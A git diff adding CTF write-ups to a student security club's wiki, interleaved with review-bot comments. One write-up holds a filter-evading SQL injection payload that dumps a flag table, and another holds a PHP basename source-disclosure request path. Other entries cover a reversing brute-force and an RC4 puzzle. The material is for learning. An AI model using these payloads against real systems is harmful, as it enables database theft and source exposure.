+?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
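Review bot: The label `沙箱绕过` (sandbox bypass) does not match what the listed restrictions and the three payloads show, which is a character blacklist (space, `=`, a 20-character output limit) in front of a SQL injection; "WAF/filter bypass" would be the accurate term and matches the quoted hint. The write-up also stops at the payloads and never states why they work: the `wllm` value evidently ends up concatenated into the query text, and filtering individual characters does not change that. A closing sentence saying that the fix is a prepared statement with bound parameters, not a longer blacklist, would give the reader the defensive takeaway.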
diff --git a/ctfnotes/problem-444-wp/index.html b/ctfnotes/problem-444-wp/index.html
new file mode 100755
index 0000000..5fe564c
--- /dev/null
+++ b/ctfnotes/problem-444-wp/index.html
@@ -0,0 +1,1310 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]re1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]re1
+
+IDA反编译
+
+发现只是做简单字符替换
+写exp
+exp
+
+#include <iostream>
+using namespace std;
+string str2 = "{34sy_r3v3rs3}";
+void dfs(int now)
+{
+ if (now == str2.length() - 1)
+ {
+ cout << "NSSCTF" << str2 << endl;
+ return;
+ }
+ if (str2[now] == 52)
+ {
+ str2[now] = 97;
+ dfs(now + 1);
+ str2[now] = 52;
+ dfs(now + 1);
+ }
+ else if (str2[now] == 51)
+ {
+ str2[now] = 101;
+ dfs(now + 1);
+ str2[now] = 51;
+ dfs(now + 1);
+ }
+ else
+ {
+ dfs(now + 1);
+ }
+}
+int main()
+{
+ freopen("ans.txt", "w", stdout);
+ dfs(0);
+}
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
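Review bot: `dfs` prints every combination of the `3`/`e` and `4`/`a` choices, so `ans.txt` holds 32 candidates for `{34sy_r3v3rs3}` rather than one flag, and the closing `得到flag` should say that the right line still has to be picked (if the decompiled routine replaces every `e` and `a` unconditionally, a plain replace gives the single answer). The ASCII codes would be clearer as character literals, e.g. `if (str2[now] == '4')` and `str2[now] = 'a';`. `freopen` needs `#include <cstdio>` and `std::string` needs `#include <string>`; both currently compile only through transitive includes. `now == str2.length() - 1` compares an `int` with a `size_t`, so declaring `now` as `size_t` removes the sign-compare warning.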
diff --git a/ctfnotes/problem-463-wp/index.html b/ctfnotes/problem-463-wp/index.html
new file mode 100755
index 0000000..3e10f0c
--- /dev/null
+++ b/ctfnotes/problem-463-wp/index.html
@@ -0,0 +1,1276 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [鹤城杯 2021]EasyP - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹤城杯 2021]EasyP
+
+审阅代码
+知识点:
+php会将
+' ','.','[','chr(128)-chr(159)'
当做'_'
+basename函数遇到非ascii会舍弃
+
+即可构建exp
+/index.php/utils.php/%ff?show%20source
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-47-wp/index.html b/ctfnotes/problem-47-wp/index.html
new file mode 100755
index 0000000..4638bb9
--- /dev/null
+++ b/ctfnotes/problem-47-wp/index.html
@@ -0,0 +1,1275 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPU 2020]套娃 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPU 2020]套娃
+~~说好的套娃呢~~
+1. 下载得到xlsx
+解压即得RC4data.txt
和swpu.xlsx
+2. 解压swpu.xlsx
+得esayrc4.xlsx
和RC4key.zip
+3. 发现RC4key.zip
需要密码
+去esayrc4.xlsx
寻找线索
+发现esayrc4.xlsx
无法解压HxD
打开就找到了password
+拿password解压RC4key.zip
+然后在线解密下RC4data.txt
就得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/index.html b/index.html
index bf8c4db..54772a6 100755
--- a/index.html
+++ b/index.html
@@ -227,6 +227,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -690,6 +706,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/member/index.html b/member/index.html
index 95795b8..b64d1d7 100755
--- a/member/index.html
+++ b/member/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -714,6 +730,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
index f57ac76..741aeea 100755
--- a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
+++ b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
index 295a3b9..e7b0ae5 100755
--- a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
+++ b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
index 8c8235f..4e850a0 100755
--- a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
+++ b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
index 5d6027d..c346fcd 100755
--- a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
+++ b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
index d90d0b1..ad32ae4 100755
--- a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
+++ b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
index 17665bd..c92c352 100755
--- a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
+++ b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
index 6f3d98f..26d15cd 100755
--- a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
+++ b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
index 4783f32..520b834 100755
--- a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
+++ b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
index d7f3779..e95e592 100755
--- a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
+++ b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -679,6 +695,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
index 2b301e3..bbc9e02 100755
--- a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
+++ b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
index 7b01eff..5d06a00 100755
--- a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
+++ b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
index 8a8d6d1..52e0c38 100755
--- a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
+++ b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
index e455d4e..611d305 100755
--- a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
+++ b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
index 4ea3ceb..b2f9f4c 100755
--- a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
+++ b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
@@ -18,6 +18,8 @@
+
+
@@ -227,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -646,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/search/search_index.json b/search/search_index.json
index 7c55937..5d24c1d 100755
--- a/search/search_index.json
+++ b/search/search_index.json
@@ -1 +1 @@
-{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002
\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn
"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63
\u5bf9\u8ba1\u7b97\u673a\u5b89\u5168\u6709\u7740\u6d53\u539a\u7684\u5174\u8da3
\u5bf9\u65b0\u4e8b\u7269\u6709\u7740\u5f3a\u70c8\u7684\u63a2\u7d22\u6b32\u671b
\u80fd\u591f\u5b8c\u6210\u6211\u4eec\u51fa\u7684\u65b0\u751f\u8d5b\u9898\uff08\u6821\u8d5b\uff09
\u80fd\u72ec\u7acb\u89e3\u51b3\u4e00\u9898\u5927\u578bCTF\u7ade\u8d5b\u7684\u9898
\u9ad8\u4e2d\u81ea\u5b66\u7b97\u6cd5\u6216\u53c2\u52a0\u8fc7\u7b97\u6cd5\u7ade\u8d5b
\u7834\u89e3\u8fc7\u67d0\u4e9b\u8f6f\u4ef6
\u5728CNVD\u3001EDUSRC\u3001HackerOne\u3001\u8865\u5929\u3001360\u3001\u963f\u91cc\u4e91\u5148\u77e5\u3001\u6216\u8005\u5728\u4f01\u4e1aSRC\uff08\u534e\u4e3a\u3001\u817e\u8baf\u3001B\u7ad9\uff09\u53d1\u8868\u6587\u7ae0\u6216\u8005\u6316
\u6398\u5e76\u63d0\u4ea4\u6f0f\u6d1e\u62a5\u544a
\u72ec\u81ea\u7814\u7a76\u8fc7\u53ef\u4fe1\u6280\u672f\u3001\u91cf\u5b50\u5b89\u5168\u3001\u4eba\u5de5\u667a\u80fd\u5b89\u5168\u3001\u5de5\u4e1a\u63a7\u5236\u5b89\u5168
\u2026\u6216\u662f\u5176\u4ed6\u4efb\u4f55\u548c\u4fe1\u606f\u5b89\u5168\u6709\u5173\u7684\u4e8b\u60c5\u3002
"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":" \u7ebf\u4e0a\u81ea\u5b66
\u534f\u4f1a\u5b66\u4e60\u5e73\u53f0\uff1ahttps://cloud.xmutsec.cn
\u5b66\u4e60\u8d44\u6599\uff1ahttps://ctf-wiki.github.io/ctf-wiki/
\u5237\u9898
\u901b\u5927\u4f6c\u4eec\u7684\u535a\u5ba2
\u575a\u6301
\u575a\u6301
\u575a\u6301
\u534f\u4f1a\u7f51\u76d8\u91cc\u62e5\u6709\u5b66\u4e60\u7f51\u7edc\u5b89\u5168\u7684\u6240\u6709\u8d44\u6599\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u4e0b\u8f7d\u5b66\u4e60\uff0c\u5982\u9047\u5230\u56f0\u96be\u53ef\u5148\u81ea\u884c\u89e3\u51b3\uff08\u6ce8\u610f\u7ffb\u9605\u300a\u63d0\u95ee\u7684\u667a\u6167\u300b\uff09\uff0c\u89e3\u51b3\u4e0d\u4e86\u7684\u5728\u5411\u5b66\u957f\u6216\u5b66\u59d0\u53d1\u8d77\u63d0\u95ee\uff0c\u7406\u5de5\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6b22\u8fce\u5168\u6821\u540c\u5b66\u7684\u5230\u6765\uff0c\u534f\u4f1a\u6bcf\u5b66\u671f\u4f1a\u4e3e\u529e\u4e00\u573a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff0c\u7528\u4e8e\u6218\u961f\u9009\u62d4\uff0c\u83b7\u5f97\u5956\u9879\u7684\u540c\u5b66\u5373\u53ef\u52a0\u5165XMUTSEC\u6216CodeMonster\u6218\u961f\uff0c\u53c2\u4e0e\u5b66\u672f\u7ade\u8d5b\u548c
"},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":" [2022\u5e7411\u670819\u65e5] - 2022\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2022\u5e7409\u670806\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b\u4e2d\u83b7\u4e09\u7b49\u5956
[2022\u5e7407\u670807\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u534e\u4e1c\u5357\u5206\u533a\u8d5b\u4e2d\u559c\u83b7\u4f73\u7ee9
[2021\u5e7412\u670811\u65e5] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2019\u5e7409\u670816\u65e5] - \u6211\u9662\u5b66\u5b50\u57282019\u5e74\u201c\u9ed1\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u77e5\u8bc6\u548c\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\u83b7\u5168\u7701\u4e9a\u519b
[2018\u5e7412\u670819\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u56db\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e8c\u540d
[2018\u5e7412\u670810\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u6211\u9662\u5b66\u5b50\u57282017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u53d6\u5f97\u4f18\u5f02\u6210\u7ee9
[2017\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e09\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u56e2\u961f\u5728\u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u4e2d\u52c7\u593a\u5168\u7701\u7b2c\u4e8c\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u4fe1\u606f\u5b89\u5168\u56e2\u961f\u5728\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u83b7\u4f73\u7ee9
[2017\u5e7405\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\u5706\u6ee1\u843d\u5e55
[2017\u5e7405\u670807\u65e5] - \u6211\u9662\u987a\u5229\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u4fe1\u606f\u5b89\u5168\u6821\u8d5b\u603b\u51b3\u8d5b
[2017\u5e7404\u670828\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u4e2d\u559c\u83b7\u5b63\u519b
[2016\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u559c\u83b7\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4f73\u7ee9
"},{"location":"award/#_3","title":"\u4e3b\u529e","text":" [2022/11/04] - 2022\u5e74 SkyNICOCTF \u66a8\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2022/05/??] - 2022\u5e74CMCTF-5\uff08AWD\uff09\u7ebf\u4e0a\u653b\u9632\u5bf9\u6297\u8d5b [2022/04/??] - 2022\u5e74CMCTF-4\uff08CTF\uff09\u6bd4\u8d5b [2021/10/??] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2018/??/??] - 2018\u5e74\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b [2018/02/13] - \u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u2642\u2642\u2642 [2017/05/06] - \u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b "},{"location":"award/#2023","title":"2023","text":" [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b \u4e00\u7b49\u5956\uff08\u7b2c5\u540d\uff09 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5de5\u63a7\u5b89\u5168\u6311\u6218\u521b\u65b0\u5355\u9879\u5956 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/04] - 2023\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u51b3\u8d5b \u5730\u70b9\uff1a\u91cd\u5e86\uff0c\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2023/06/27] - \u7b2c\u4e09\u5c4a\u4e2d\u56fd\uff08\u6c88\u9633\uff09\u667a\u80fd\u7f51\u8054\u6c7d\u8f66\u5927\u8d5b\u51b3\u8d5b\uff08\u667a\u80fd\u7f51\u8054\u6c7d\u8f66 \"\u5929\u878d\u4fe1\u676f\" \u4fe1\u606f\u5b89\u5168\u653b\u9632\u8d5b\uff09\u521d\u8d5b12\u540d 
\u5730\u70b9\uff1a\u6211\u89c9\u5f97\u4e3b\u529e\u65b9\u5f88\u6709\u5fc5\u8981\u5b66\u4e60\u4e00\u4e0b\u5dee\u65c5\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u673a\u7968\u592a\u8d35\u98de\u4e0d\u4e86\u6c88\u9633 [2023/06/24] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\uff08\u534e\u4e1c\u5357\u5206\u533a\u9009\u62d4\u8d5b\uff09\uff0c\u56e2\u4f53\u4e00\u7b49\u5956\uff08\u664b\u7ea7\u603b\u51b3\u8d5b\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/06/03] - 